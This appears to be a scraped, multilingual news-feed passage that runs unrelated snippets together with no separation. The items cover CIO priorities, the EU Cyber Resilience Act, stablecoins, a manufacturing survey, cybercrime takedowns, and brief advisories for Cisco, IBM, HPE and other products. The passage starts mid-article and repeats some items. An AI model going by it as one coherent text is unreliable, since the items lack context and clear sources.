iniziativa elencata dai rispondenti delle linee di business (LOB).Nel frattempo, dal rapporto CIO Leadership Perspectives di Gartner [in inglese] emerge che “i CIO hanno citato la sicurezza informatica e la gestione dei rischi come la loro priorità numero uno per il quarto anno consecutivo”.“La sicurezza sarà sempre una priorità”, nota Thomas Phelps IV, CIO di Laserfiche e membro del comitato consultivo del SIM Research Institute.Phelps afferma che l’implementazione di nuove tecnologie di sicurezza, il miglioramento delle valutazioni dei rischi di terze parti [in inglese] e il rafforzamento della garanzia della privacy dei dati sono tra i suoi progetti principali per quest’anno. 6. La customer experience Il miglioramento dell’esperienza del cliente (CX) continua a essere uno dei progetti principali per i CIO di oggi.Sempre secondo State of the CIO, “in considerazione di una rinnovata attenzione per la customer experience, i leader IT stanno promuovendo una serie di tecnologie incentrate su di essa, che includono dati e analisi, nonché AI/ML e automation”.Il lavoro di Phelps sulla CX rispecchia questa osservazione.Per esempio, Laserfiche sta aggiungendo l’automazione al processo di preventivazione per offrire ai clienti una maggiore visibilità sulle transazioni e a quello che riguarda l’evasione degli ordini e all’assistenza clienti. Inoltre, sta utilizzando l’intelligenza artificiale per acquisire una visione a 360 gradi dei clienti e delle loro esigenze, al fine di migliorare la velocità e l’efficacia del programma di assistenza clienti e offrire più opzioni self-service.“I nostri clienti si aspettano sempre di più in termini di assistenza reattiva e di alta qualità, quindi abbiamo una serie di iniziative per aiutare a semplificare le interazioni con la customer care”, spiega Phelps. 7. Le fondamenta IT Sebbene i CIO stiano portando avanti le ultime tecnologie di intelligenza artificiale e automazione, continuano a prestare grande attenzione anche alle funzionalità IT di base.Secondo l’Agenda CIO 2025 [in inglese] di Gartner, “oltre l’80% dei leader tech prevede di investire in funzionalità fondamentali, tra cui: sicurezza informatica, GenAI, business intelligence e analisi dei dati, nonché tecnologie di integrazione come le API”.Il rapporto afferma, inoltre, che “queste tecnologie fondamentali guidano l’innovazione, migliorano l’efficienza operativa e aiutano le imprese a mantenere un vantaggio competitivo in un panorama sempre più digitale”.Taylor di SIM afferma che i CIO stanno, per esempio, aggiornando i sistemi di pianificazione delle risorse aziendali (ERP) [in inglese], perfezionando l’uso del cloud [in inglese] per ottimizzare l’elaborazione riducendo al minimo i costi [in inglese] e abbandonando i sistemi legacy. Altri citano aggiornamenti, come il passaggio da Windows 10 a Windows 11 prima che Microsoft termini il supporto per la versione precedente.I CIO affermano di riconoscere la continua necessità di essere impeccabili nelle fondamenta dell’IT per portare le loro organizzazioni verso il futuro. 8. Modernizzare l’IT Tutto questo lavoro sulle fondamenta non significa che i CIO accettino lo status quo; anzi, sono desiderosi di rinnovare i loro stack tecnologici con funzionalità moderne e ne stanno facendo una parte importante del loro programma di lavoro.Per Joshua Bellendir, vice presidene senior dell’IT e CIO di WHSmith North America, ciò significa “ritirare i vecchi sistemi legacy che ci rallentano, introdurre soluzioni moderne e costruire livelli di dati e sistemi fondamentali. Tutto ciò che facciamo, dalla modernizzazione al cloud-first, supporterà la nostra iniziativa sui dati e ci forniràquelli di cui abbiamo bisogno per l’AI, consentendoci di scalare e far crescere il business”.A detta di Patel di Accenture, la domanda di core IT scalabili e adattabili a livello regionale, le pressioni normative e la sovranità dei dati sono alla base di gran parte degli sforzi di modernizzazione odierni.I CIO stanno passando ad architetture modulari e cloud-first su misura per le esigenze regionali, nonché a una strategia “asset-right” che bilancia il cloud e l’infrastruttura di proprietà, aggiunge.La modernizzazione, tuttavia, non è un compito facile, afferma Patel, poiché le infrastrutture legacy frammentate, la dipendenza da un unico fornitore e la limitata predisposizione al cloud delle applicazioni aziendali core creano sfide significative. 9. Ripensare l’IT per il futuro Bellendir non si sta limitando a modernizzare l’infrastruttura IT di WHSmith North America, ma la sta rendendo a prova di futuro, per esempio passando a microservizi e altri approcci e tecnologie che supporteranno meglio gli obiettivi aziendali, come una migliore CX, nei prossimi anni.“Stiamo gettando le basi per il futuro, in modo da poter fare tutto ciò che vogliamo; questo è fondamentale per la mia strategia attuale”, rileva. “Dal punto di vista dei progetti IT e dei sistemi, il futuro è davvero specifico per la nostra attività, per dove stiamo andando e per ciò che abbiamo in programma di fare”.E poi aggiunge: “Penso che siamo in una buona posizione grazie agli investimenti che abbiamo fatto finora”.Patel concorda sulla necessità di garantire la sostenibilità futura e di “reinventare il modello operativo tecnologico”.“Le strutture IT tradizionali non sono in grado di sostenere il ritmo del cambiamento”, conclude. “Stiamo assistendo a una svolta verso modelli operativi basati sull’intelligenza artificiale: team più snelli, gerarchie appiattite e un approccio alla consegna che integra uomo e macchina. I CIO stanno diventando gli architetti dell’agilità organizzativa”.

Behind the tariff headlines, cybersecurity experts are watching for something less visible but just as consequential: a wave of state-sponsored cyber operations.

The authors who claimed America hacked itself to discredit Beijing are back with another report Beijing complains it’s under relentless attack by the equivalent of an ant trying to shake a tree China’s National Computer Virus Emergency Response Center on Thursday published a report in which it claims Taiwan targeted it with a years-long but feeble cyber offensive, backed by the USA.

Cyberbedrohungen existieren längst nicht mehr im luftleeren Raum – sie entstehen im Spannungsfeld von Geopolitik, regulatorischer Zersplitterung und einer stetig wachsenden digitalen Angriffsfläche.vectorfusionart – shutterstock.com Cybersecurity ist heute ein rechtliches, operatives und geopolitisches Thema. Für CIOs und CISOs ist die Botschaft eindeutig: Resilienz bedeutet nicht mehr nur, zu reagieren, sondern vorbereitet zu sein. Vorbereitung heißt, Systeme – und Teams – aufzubauen, die sowohl dem Druck von Hackerangriffen als auch neuen regulatorischen Anforderungen standhalten können. Neue digitale Pflichten, alte geopolitische Spannungen In diesem Zusammenhang ist der Cyber Resilience Act (CRA) nicht nur ein weiterer regulatorischer Rahmen, sondern ein strategischer Wendepunkt. Die digitale Bedrohungslage wird zunehmend komplexer: staatlich unterstützte Angriffe, fragmentierte globale Regulierung und grenzüberschreitende IT-Abhängigkeiten treffen auf neue gesetzliche Anforderungen. IT-Sicherheit ist nicht länger nur ein technisches Thema – sie wird zum Bestandteil unternehmerischer Resilienz und Risikosteuerung. Sicherheitsvorgaben werden zum Geschäftsrisiko Mit dem CRA schließt die EU eine langjährige Lücke in ihrer Digitalpolitik: Erstmals gelten verbindliche Cybersicherheitsanforderungen für nahezu alle vernetzten Produkte. Vom vernetzten Haushaltsgerät bis hin zu komplexer Unternehmensinfrastruktur – alles fällt künftig unter einen einheitlichen, verpflichtenden Rahmen. Doch der eigentliche Paradigmenwechsel ist nicht technischer, sondern strategischer Natur: Sicherheit ist kein Feature mehr – sie ist regulatorische Pflicht, Reputationsfaktor und haftungsrelevantes Thema zugleich. Für besonders risikobehaftete Produktkategorien wie SIEM-Systeme, Firewalls oder intelligente Zähler bedeutet das: strenge Tests, lückenlose Dokumentation und kontinuierliches Monitoring – über den gesamten Lebenszyklus hinweg, von der Entwicklung bis zur Außerbetriebnahme. Der CRA verpflichtet Hersteller und Anbieter künftig dazu: Sicherheit ab der Produktentwicklung zu integrieren („Security by Design“); Schwachstellen systematisch zu dokumentieren und zu melden; Sicherheitsupdates über den gesamten Lebenszyklus bereitzustellen; bei Hochrisikoprodukten strengere Prüf- und Berichtspflichten einzuhalten. Die Botschaft ist klar: Sicherheit wird zur Haftungsfrage – und damit zur Managementverantwortung. Compliance als Wettbewerbsvorteil Ja, die Einhaltung des CRA erfordert Investitionen – in Architektur, Teams und Governance-Strukturen. Doch gleichzeitig eröffnet sich eine seltene Chance, die eigene Wettbewerbsposition zu stärken. Ein einheitlicher EU-Rahmen reduziert regulatorische Zersplitterung, verringert Markteintrittsbarrieren und schafft einen klaren Maßstab für Produktsicherheit. Wer frühzeitig handelt, gewinnt mehr als nur Sicherheit – er gewinnt Vertrauen. Besonders in Sektoren, in denen Resilienz ein echtes Differenzierungsmerkmal ist: im Finanzwesen, in der Gesundheitsbranche und der Energiewirtschaft. In einem Markt, der zunehmend durch Lieferkettentransparenz und Käuferskepsis geprägt ist, ist Compliance nicht nur ein Kostenfaktor – sie wird zum strategischen Vermögenswert. Geopolitik wird Teil der IT-Risikoanalyse Digitale Risiken beschränken sich längst nicht mehr auf technische Schwachstellen. Datenhoheit, Exportkontrollen und Lieferkettenabhängigkeiten machen geopolitische Überlegungen zum festen Bestandteil der IT-Strategie. Es reicht nicht mehr zu wissen, wo Daten liegen – entscheidend ist, wie Infrastrukturen auf regulatorische und politische Druckpunkte reagieren. CIOs und CISOs sollten sich unbequeme Fragen stellen – Fragen, die über klassische Risikomodelle hinausgehen: Welche Teile meiner IT-Infrastruktur unterliegen außereuropäischen Rechtsregimen? Wie sind Dritt- und Viertanbieter geografisch und politisch verteilt? Welche regulatorischen Konflikte könnten den Geschäftsbetrieb beeinflussen? Der CRA ist damit auch ein Signal: Resilienz braucht geopolitisches Denken. Hybridlösungen: Architektur gegen Unsicherheit Hybride Architekturen, die lokale Kontrolle mit der Flexibilität der Cloud verbinden, werden in einer Welt zunehmender regulatorischer Komplexität und geopolitischer Zersplitterung immer unverzichtbarer. Wer Daten lokal speichert, wo es erforderlich ist, und gleichzeitig zentrale Kontrolle über Cloud-Komponenten behält, schafft ein resilientes Setup. Die Lebenszyklusanforderungen des CRA – etwa zeitnahe Sicherheitsupdates, Schwachstellenmanagement und Vorfallmeldung – lassen sich deutlich effizienter in modularen, hybriden Systemen umsetzen. Diese ermöglichen ein dynamisches Patching und Transparenz über verschiedene Umgebungen hinweg. Rein lokale oder rein cloudbasierte Systeme stoßen hier zunehmend an ihre Grenzen – entweder beim Datenschutz oder bei der Skalierung. Die Zukunft gehört Systemen, die sich ebenso schnell anpassen, segmentieren und skalieren lassen wie die Gesetze und Bedrohungen, die sie formen. Cyberresilienz ist eine Führungsaufgabe Der Cyber Resilience Act ist mehr als ein politischer Kurswechsel – er ist ein Warnschuss. Sicherheit, Souveränität und Lieferkettenkomplexität konvergieren – und fordern eine neue Rolle für IT-Führungskräfte. Für CIOs und CISOs ist das ein Aufruf zur Führung – nicht bloß zur Einhaltung. Das bedeutet: Sicherheit über den gesamten Produktlebenszyklus hinweg mitdenken, Architekturen entwickeln, die sich regulatorischem Druck flexibel anpassen, und eine enge Zusammenarbeit mit den Rechts- und Risikoteams etablieren. Wer früh handelt, vermeidet nicht nur Strafen – sondern baut Vertrauen auf, sichert sich Marktzugang und gestaltet den neuen Standard digitaler Betriebsmodelle aktiv mit. In einer Zeit, in der Resilienz zum entscheidenden Unterscheidungsmerkmal wird, beginnt Führung jetzt. (jm) Lesetipp: Klöckner-CISO: „In der Security geht es vor allem um Resilienz“

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

To make matters worse, IBM's security software has a critical vuln caused by an exposed password IBM isn’t having its best week after the company experienced another cloudy outage and a critical-rated vulnerability.

CB인사이츠(CBInsights)가 스테이블코인(Stablecon)과 협력해 ‘스테이블코인 시장 지도(stablecoin market map)’을 5월 29일 발표했다. 스테이블코인의 핵심 인프라, 소비자 금융 서비스, 기업 솔루션 등 스테이블코인 생태계 안에서 빠르게 성장하는 시장과 기업을 파악할 수 있는 자료다. 2024년 10억 달러에 달했던 스테이블코인 기업에 대한 투자 규모가 2025년에는 123억 달러로 크게 증가할 전망이다. 주류 금융 기관의 시장 진입, 거래를 넘어선 사용 사례의 확대, 전 세계적으로 증가하는 규제 명확성 제고가 시장에 대한 관심과 성장을 이끌 것이라는 것이 CB인사이츠의 분석이다. 이번에 발표한 스테이블코인 시장 지도는 600개 이상의 스테이블코인 관련 스타트업을 분석한 후, 최근 투자 유치를 통해 성장 잠재력을 가진 것으로 평가되는 172개 기업을 선정했다. CB인사이츠가 스타트업을 평가할 때 사용하는 모자익(Mosaic) 점수를 통해 선정하고, 주요 사업 분야에 따라 8개 범주로 분류했다. CB인사이츠는 “기존의 암호화폐와 달리 기초 자산과의 연계를 통해 안정적인 가치를 유지하는 스테이블코인은 암호화폐의 도입의 주요 장애물인 변동성을 해결하고 있다”고 밝혔다. 이러한 안정성이 기존 금융권의 주요 업체들을 스테이블코인 생태계 안으로 끌어들이면서, 암호화폐 기반 뱅킹(Banking) 기반을 마련하고 있는 것이다. 스테이블코인이 수동적인 가치 저장소가 아닌 고성장 금융 상품으로 전환되면서, 스테이블코인이 위험성이 높은 암호화폐보다 안전한 대안이라는 기존 역할을 넘어 수익 창출 도구 및 유동성 상품으로 진화하는 것도 변화의 배경이다. 스테이블코인을 포함하는 유동성 수익률 부문은 지난 12개월 동안 40건의 거래에서 23억 달러의 자금을 유치한 것으로 나타났다. 국제 결제에서 스테이블코인이 핵심 활용 분야로 두각을 드러내고 있는 점도 눈여겨볼 부분이다. 스테이블코인은 지역에 따라 법정화폐의 특화된 대안 또는 미국 달러의 대체제 역할을 하면서, 결제 처리 업계의 모든 기업이 국가 간 결제 인프라를 지원하고 있다. 이러한 장점 때문에 미국 이외의 지역에서 스테이블코인의 사용 사례가 증가하고 있으며, 글로벌 투자 패턴에도 변화를 일으키고 있다. 스테이블코인 시장 지도에 포함된 기업들 중에서 미국 이외의 지역에 본사를 둔 기업들이 지난 1년 동안 전체 거래의 절반 이상을 차지한 것으로 조사됐다.dl-ciokorea@foundryco.com

Classification: Critical, Solution: Official Fix, Exploit Maturity: Not Defined, CVSSv3.1: 9.9, CVEs: CVE-2025-20286, Summary: A critical vulnerability has been identified in the Amazon Web Services (AWS), Microsoft Azure, and Oracle Cloud Infrastructure (OCI) cloud deployments of Cisco Identity Services Engine (ISE). The vulnerability could allow an unauthenticated, remote attacker to access sensitive data, execute limited administrative operations, modify system configurations, or disrupt services within the impacted systems. This vulnerability exists because credentials are improperly generated when Cisco ISE is being deployed on cloud platforms, resulting in different Cisco ISE deployments sharing the same credentials. These credentials are shared across multiple Cisco ISE deployments as long as the software release and cloud platform are the same. An attacker could exploit this vulnerability by extracting the user credentials from Cisco ISE that is deployed in the cloud and then using them to access Cisco ISE that is deployed in other cloud environments through unsecured ports. The vulnerability affects instances of Cisco ISE with default configurations with versions 3.1, 3.2, 3.3 and 3.4 for AWS and 3.2, 3.3 and 3.4 for Azure and OCI.

Classification: Severe, Solution: Official Fix, Exploit Maturity: Not Defined, CVSSv3.1: 9.6, CVEs: CVE-2025-25019, CVE-2025-25022, CVE-2025-25021, CVE-2025-1334, CVE-2025-25020, Summary: Multiple different vulnerabilities have been identified and fixed in IBM QRadar. The most severe vulnerability is rated critical and allows an unauthenticated user to obtain highly sensitive information from configuration files. The vulnerabilities affect BM Cloud Pak for Security versions 1.10.0.0 - 1.10.11.0 and QRadar Suite Software 1.10.12.0 - 1.11.2.0.

Classification: Critical, Solution: Official Fix, Exploit Maturity: Not Defined, CVSSv3.1: 9.8, CVEs: CVE-2025-37089, CVE-2025-37090, CVE-2025-37091, CVE-2025-37092, CVE-2025-37093, CVE-2025-37094, CVE-2025-37095, CVE-2025-37096, Summary: Multiple security vulnerabilities have been identified and fixed in HPE StoreOnce. The vulnerabilities could allow an attacker remote code execution, disclosure of information, server-side request forgery, authentication bypass, arbitrary file deletion, and directory traversal information disclosure vulnerabilities. The most severe vulnerability identified is rated critical. The vulnerabilities affect HPE StoreOnce VSA prior to version v4.3.11.

Multiple vulnerabilities were identified in Microsoft Edge. A remote attacker could exploit some of these vulnerabilities to trigger remote code execution, sensitive information disclosure and data manipulation on the targeted system.   Note: CVE-2025-5419 is being exploited in the wild. A remote... Impact Remote Code Execution Information Disclosure Data Manipulation System / Technologies affected Microsoft Edge version prior to 137.0.3296.62 Solutions Before installation of the software, please visit the software vendor web-site for more details. Apply fixes issued by the vendor: Update to version 137.0.3296.62 or later

The FTC's Andrew Ferguson called on Congress to update federal law to get rid of exceptions for tech firms that handle children's data.

이번 보고서는 제 10차 연례보고서로 2025년 3월, 주요 17개 제조국의 1,500개 이상의 제조 업체를 대상으로 실시한 글로벌 조사를 기반으로 ▲인공지능(AI), 머신러닝(ML), 클라우드 기반 시스템 등 첨단 기술의 도입과 활용 ▲사이버보안 ▲인재 전략 등 현재 제조업이 직면한 핵심 이슈들을 다뤘다. 로크웰 오토메이션은 특히 급변하는 경제 환경 속에서 제조업체들이 불확실성에 대응하고자 스마트 제조 기술을 활용해 위험을 관리하고, 운영 성과를 개선하며, 인재를 효과적으로 지원하는 방식을 중점적으로 분석했다고 설명했다. 올해 보고서에 따르면, 제조업계는 스마트 제조 기술로의 전환 속도를 더욱 높이고 있다. 전체 응답 제조 업체의 81%는 외부 및 내부 압력으로 인해 디지털 트렌스포메이션이 가속화되고 있다고 응답했으며, 스마트 제조 기술 투자의 주요 분야로는 클라우드/SaaS, AI, 사이버 보안, 품질 관리를 꼽았다.  특히 인공지능 기술에 대한 관심이 두드러졌다. 전체 제조기업의 95%가 AI 또는 ML에 투자했거나 향후 5년 내에 투자 계획을 갖고 있다고 응답했다. 생성형 AI와 인과관계 AI에 투자하는 조직은 전년 대비 12% 증가했는데, 이는 AI 도입이 이제 실험 단계를 넘어 비즈니스 성과를 높이기 위한 전략적 선택으로 자리잡고 있는 것을 시사했다.   AI 활용의 주요 목적은 품질 향상으로, 응답자의 절반(50%)이 제품 품질 관리를 위해 AI/ML 도입할 계획이라고 밝혔다. 품질 관리는 지난해에 이어 2년 연속으로 AI의 대표적인 활용 사례로 꼽혔다. 이와 함께 사이버보안은 AI 활용 계획 분야 중 두 번째로 높은 응답률(49%)을 기록했다. 이는 2024년 40%에서 증가한 수치로, 제조 환경에서 보안 리스크에 대한 경각심이 한층 높아졌음을 보여준다고 로크웰 오토메이션은 설명했다.   로크웰 오토메이션에 따르면 AI 기술은 인력 문제 해결에서도 중요한 역할을 하고 있다. 전체 응답 기업의 48%는 스마트 제조 기술 투자를 통해 기존 인력을 재배치하거나 신규 채용할 계획이라고 밝혔으며, 41%는 AI 및 자동화를 통해 기술 격차 해소 및 인력난 대응에 나설 계획이라고 답했다.   이 외에도 보고서는 제조업체들이 스마트 기술을 기반으로 보다 효율적이고 유연한 운영 체계를 구축하고 있다고 설명했다. 제조업체들은 공급망 강화를 비롯해 지속 가능성 이니셔티브 확대, 데이터 기반의 신속한 의사결정 등 다양한 부문에서 전환을 가속화하고 있다. AI 기술에 대한 수요가 높아지는 가운데 많은 제조업체들이 도입 과정에서 여러 과제에 직면하고 있는 것으로 확인됐다. 응답자의 절반 가까이가 AI 구현 역량을 ‘매우 중요한 기술’로 인식하고 있다는 점에서 그렇다. 이는 작년의 10%에서 크게 증가한 수치다.   로크웰 오토메이션의 회장 이자 CEO인 블레이크 모렛은 “오늘날의 기술 발전은 사람과 기술의 잠재력을 결합해 우리 모두의 미래를 새롭게 설계할 기회를 제공하고 전 세계 제조업체들이 스마트 제조 기술을 통해 혼란 속에서도 속도와 민첩성을 확보하며 새로운 비즈니스 기회를 창출하고 있음을 의미한다”라며, “로크웰 오토메이션은 혁신과 복원력이 밀접하게 연결되어 있고, 급변하는 환경 속에서도 올바른 기술과 인력을 통해 복잡성을 단순화하고 업계를 선도할 수 있도록 지원하고 있다”고 말했다. dl-ciokorea@foundryco.com

Le 01 juin 2025, Roundcube a publié des correctifs concernant une vulnérabilité critique affectant son portail de messagerie ainsi que tous les produits l'incluant (par exemple cPanel et Plesk). Cette vulnérabilité permet à un utilisateur authentifié d'exécuter du code arbitraire à distance....

De multiples vulnérabilités ont été découvertes dans les produits Cisco. Certaines d'entre elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et une atteinte à l'intégrité des données.

Une vulnérabilité a été découverte dans Wireshark. Elle permet à un attaquant de provoquer un déni de service à distance.

De multiples vulnérabilités ont été découvertes dans VMware NSX. Elles permettent à un attaquant de provoquer une injection de code indirecte à distance (XSS).

A iniciativa, promovida pela Rede de Bibliotecas Escolares (RBE) e pela Estrutura de Missão para a Comunicação Social (#PortugalMediaLab), em parceria com o Centro Nacional de Cibersegurança (CNCS), a Direção-Geral da Educação (DGE), a Comissão Nacional da Unesco (CNU), o Plano Nacional de Cinema (PNC), o Plano Nacional de Leitura 2027 (PNL2027) e a Associação DNS.PT (.PT) distinguiu os melhores trabalhos de 2025, já disponíveis online. Esta edição do concurso enquadrou-se no Ano Europeu da Educação para a Cidadania Digital, 2025, promovido pelo Conselho da Europa, e teve como tema: Inteligência artificial e media. O concurso foi aberto a todos os alunos do ensino básico e secundário, oferecendo a oportunidade de expressarem as suas ideias através de vídeos, podcasts ou animações 2D ou 3D. Na categoria 1.º/ 2.º ciclos do ensino básico, o júri decidiu não atribuir Prémios ou Menções Honrosas. Na Categoria 3.º ciclo/ ensino secundário: 1.º Prémio foi atribuído à Escola Secundária du Bocage, Setúbal, pelo vídeo “Sorri! AI para todos”. 2.º Prémio foi atribuído à Escola Básica 2,3 de Nogueira, Agrupamento de Escolas Alberto Sampaio, Braga, pelo vídeo “Contra mão”. Foram ainda entregue Menções Honrosas à Escola Básica de Argoncilhe, Agrupamento de Escolas de Argoncilhe, pelo vídeo “Eco digital”; à Escola Secundária de Santo André, Agrupamento de Escolas de Santo André, Barreiro, pela animação “IA, inimiga ou amiga?”; à Escola Básica e Secundária Professor Armando de Lucena, Agrupamento de Escolas Professor Armando de Lucena, Malveira, Mafra, pelo vídeo “Sombras” e à Escola Básica 2,3 André Soares, Agrupamento de Escolas André Soares, Braga, pela animação “Um santo Os trabalhos distinguidos podem ser vistos no canal Youtube do concurso.

While DNP3 helps ensure reliable and interoperable communication between devices, it also presents new cybersecurity challenges.

Over the last week, we have seen Russia use a combination of tactics in warfare that has not been seen before. From the use of cellular telephone networks for distribution of information that was designed to incite panic among the general population to manipulation of enterprise networks and computers to disrupt critical government departments and private industry. Vladimir Putin has proven that there are no boundaries that he is unwilling to cross when it comes to promoting his self-serving view of the world.

Recompiled binaries and phone threats used to boost the pressure Groups linked with the Play ransomware have exploited more than 900 organizations, the FBI said Wednesday, and have developed a number of new techniques in their double-extortion campaigns - including exploiting a security flaw in remote-access tool SimpleHelp if orgs haven't patched it.

This daily article is intended to make it easier for those who want to stay updated with my regular Dark Web Informer and X/Twitter posts.

Threat Attack Daily - 4th of June 2025

Ransomware Attack Update for the 4th of June 2025

After three years of peddling stolen data, BidenCash, one of the web's most brazen cybercrime hubs is offline, and authorities say they're just getting started.

Cuando se trata de diseñar la estrategia empresarial, el departamento de TI tiene cada vez mayor protagonismo. Quizás hace unos años se movía al margen de la junta directiva, como un mero proveedor sin mayor impacto en el negocio. Pero en un contexto como el actual, con la tecnología aportando valor añadido a las organizaciones, habilitando nuevos filones por explotar, estas barreras se han difuminado.   Sin embargo, esto no siempre se traduce en un alineamiento perfecto entre TI y negocio. El estudio IT Leaders Pulse 2022, realizado a través de entrevistas a un millar de líderes tecnológicos, cifraba en un 98% quienes consideraban que los procesos de trabajo entre sus departamentos y los equipos de negocio podían mejorarse. En los tres años que han pasado desde que saliese el estudio se han dado distintos factores que podrían impactar en sus conclusiones. Por un lado, se ha mitigado el fenómeno de la gran renuncia, que por aquel entonces estaba en pleno impacto y, como tal, permeaba el informe. Algunas enseñanzas han quedado, como la necesidad de trabajar en las condiciones adecuadas para retener el talento, pero el escenario es distinto.   Además, la explosión de la IA generativa y, en concreto, de su modalidad agentiva, ha supuesto un nuevo impulso al papel del departamento tecnológico, con nuevas herramientas que pueden impulsar el negocio. De acuerdo al informe Empleabilidad y talento digital 2024 de la Fundación VASS, un 51% de organizaciones creen que la IA generativa influirá de manera importante en las compañías, previendo una mejora en la eficiencia de más del 10%, mientras que casi el 38% cree que habrá un impacto moderado. “Ello implica considerar que esta tecnología es clave y estratégica para sus sectores; de tal manera que su no adopción puede suponer un riesgo para la supervivencia de la empresa”, destacan. También se referían a esto desde BSG con “alinear las iniciativas de datos con objetivos de negocio”, dentro de las prioridades que identificaban para el Foro Económico Mundial (World Economic Forum) para 2024. La ‘genIA’ obliga a las organizaciones a mejorar el control sobre los datos para aprovechar sus beneficios, y “parte de esto será educar a la junta directiva en lo que significa realmente ser una compañía orientada a datos”, explicaban. “Seguiremos viendo a negocio y TI acercarse” para así alcanzar el éxito.   La explosión de la IA generativa y agentiva ha supuesto un nuevo impulso al papel del departamento tecnológico “El departamento de TI ha pasado de ser un área de soporte a convertirse en un elemento clave en la definición e implementación de la estrategia empresarial”, desarrolla la vicerrectora de Transformación Digital de la UPV (Universidad Politécnica de Valencia) y antigua directora de la ETSI Informática, Silvia Terrasa, quien señala que en algunos sectores como finanzas o sanidad, donde la digitalización es crítica, el área tecnológica ya se ha integrado en el núcleo estratégico. “No obstante, hay camino que recorrer aún en otro tipo de organizaciones donde todavía persiste una visión instrumental de la tecnología, lo que impide que se perciba la capacidad que tiene el departamento de TI para otorgar valor y permitir una transformación real”, matiza.  Relación con la junta directiva  En este alineamiento entre los objetivos de negocio y el área de TI tiene un papel esencial la persona al mando de este último departamento. Como el del equipo que lidera, el rol de CIO ha evolucionado de forma consistente al creciente desarrollo tecnológico, ganando peso en la junta directiva. Si en el informe State of the CIO 2023 era un 49% de líderes de TI los que decían reportar directamente a su CEO, dos años más tarde el porcentaje ha crecido hasta el 58%. Como explicaba en 2023 la analista de Gartner Mandi Bishop, en esta posición se está experimentando “un cambio de paradigma, compartiendo responsabilidades de liderazgo con sus pares CxO para atraer el éxito digital”. “Para liderar exitosamente las iniciativas de transformación digital, los CIO deben compartir esfuerzos con líderes de negocio para situar el diseño, la entrega y la gestión de las capacidades digitales con los equipos más cerca de donde se crea el valor”.   Aunque la teoría esté clara, llevarla a la práctica a veces conlleva ciertas dificultades. “Es frecuente encontrar desajustes”, señala Terrasa. “Hay que tener en cuenta que los equipos directivos y los departamentos de TI suelen hablar lenguajes distintos”, lo que puede llevar a no entender las complejidades técnicas o no contar con la visión de negocio necesaria para priorizar. También se dan distintas prioridades y calendarios de actuación. “Introducir perfiles intermedios que sean capaces de establecer un diálogo entre los dos actores es fundamental para el buen funcionamiento”, valora. En el citado estudio IT Leaders Pulse 2022 se apuntaba precisamente a la creación de equipos multidisciplinares como una vía para sortear estas diferencias, con personas de la parte de tecnología y otras de negocio, entendiendo que “tanto las personas como los procesos dependen fuertemente de la tecnología para alcanzar los objetivos de negocio”.   Terrasa refiere la necesidad de una gobernanza tecnológica clara como uno de los grandes retos para alinear objetivos. “Otra de las dificultades es que se suele infravalorar lo que ‘cuesta’ el incorporar la tecnología en los procesos productivos, por lo que se suele dotar de una financiación insuficiente para hacerles frente”. Esto tiene una segunda derivada, añade: los profesionales TI cada vez están más demandados. “No se generan la cantidad necesaria de profesionales TI, lo cual provoca una falta de talento y una rotación excesiva que hace que no exista una estabilidad en los equipos”. En España, la rotación en tecnología se sitúa entre el 15-20% anual, por encima del 12-15% de la media europea; perfiles como los de desarrolladores full-stack junior cambian de empresa de media cada un año y medio y dos años.  Evitar la fuga de talento El entorno tecnológico sufre de una permanente falta de talento. Una encuesta de IDC de 2024 estimaba en más del 90% las organizaciones de todo el mundo que se verán afectadas en 2026 por la brecha de profesionales con habilidades TI. Según la Fundación VASS, la falta de talento digital en España supone una menor actividad que, traducida a términos económicos, se situaría en los 1.180 millones de euros. Estos datos hacen tanto más acuciante la necesidad de que la estrategia de negocio y la parte de TI vayan de la mano, de tal modo que no tenga efectos negativos en el equipo.   “Es importante integrar la innovación como eje estratégico, no solo como herramienta de soporte” Silvia Terrasa Para evitar que ocurra, Terrasa avanza la necesidad de incorporar en la planificación empresarial aspectos digitales “desde el inicio, no solo en la ejecución”. “A nivel de la definición de las líneas estratégicas, puede ser interesante establecer KPI compartidos entre negocio y TI para alinear objetivos y medir avances conjuntos. Y obviamente es fundamental darle visibilidad y reconocimiento del área TI como generadora de valor, no solo como un coste”, perfila.  Mediante esa sintonía entre negocio y tecnología se pueden tomar medidas para evitar la fuga de talento tecnológico, señala. “La estrategia debería empezar entendiendo que el talento TI no solo busca salario, sino propósito, crecimiento, autonomía y retos tecnológicos interesantes, y por tanto crear trayectorias profesionales técnicas atractivas”. En esta misma línea, desde Michael Page apuntan tres demandas principales de profesionales del sector: piden una remuneración competitiva, flexibilidad y conciliación laborar y oportunidades de desarrollo profesional.    “Además, es importante integrar la innovación como eje estratégico, no solo como herramienta de soporte”, continúa Terrasa, “ofreciendo al personal técnico oportunidades reales de participar en proyectos transformadores. Si esto se desarrolla convenientemente, se deberían evitar la desconexión entre tecnología y negocio, haciendo que los profesionales TI se sientan parte del propósito global, no como un servicio aislado, mejorando su integración y su fidelidad”.

The cybercrime marketplace was used by more than 117,000 customers and trafficked more than 15 million credit card numbers since March 2022, the Justice Department said. The post Feds seize 145 domains associated with BidenCash cybercrime platform appeared first on CyberScoop.

The cybercrime marketplace was used by more than 117,000 customers and trafficked more than 15 million credit card numbers since March 2022, the Justice Department said. The post Feds seize 145 domains associated with BidenCash cybercrime platform appeared first on CyberScoop.

A requirement that ICE agents ensure courthouse arrests don’t clash with state and local laws has been rescinded by the agency. ICE declined to explain what that means for future enforcement.

A little more than three-quarters of these exposed devices are located in Europe, followed by Asia, with 17%.

Drones are not enough Following a daring drone attack on Russian airfields, Ukrainian military intelligence has reportedly also hacked the servers of Tupolev, the Kremlin's strategic bomber maker.

Research shows that AI-generated code is remarkably insecure. Yet experts tell CyberScoop it's up to industry to figure out a way to limit the issues the technology introduces.   The post Vibe coding is here to stay. Can it ever be secure?  appeared first on CyberScoop.

Research shows that AI-generated code is remarkably insecure. Yet experts tell CyberScoop it's up to industry to figure out a way to limit the issues the technology introduces.   The post Vibe coding is here to stay. Can it ever be secure?  appeared first on CyberScoop.

According to Gartner®, current projections indicate a substantial increase in the adoption rate of Preemptive Cyber Defense (PDC) solutions from 5% to 35% by 2028. Generative AI is transforming cybersecurity, making traditional “detect and respond” methods insufficient in blocking modern-day attacks. Malicious actors are using AI to scale and personalize attacks, requiring preemptive threat intelligence […] The post Emerging Tech: Adoption Trends in Preemptive Cyber Defense appeared first on Silent Push.

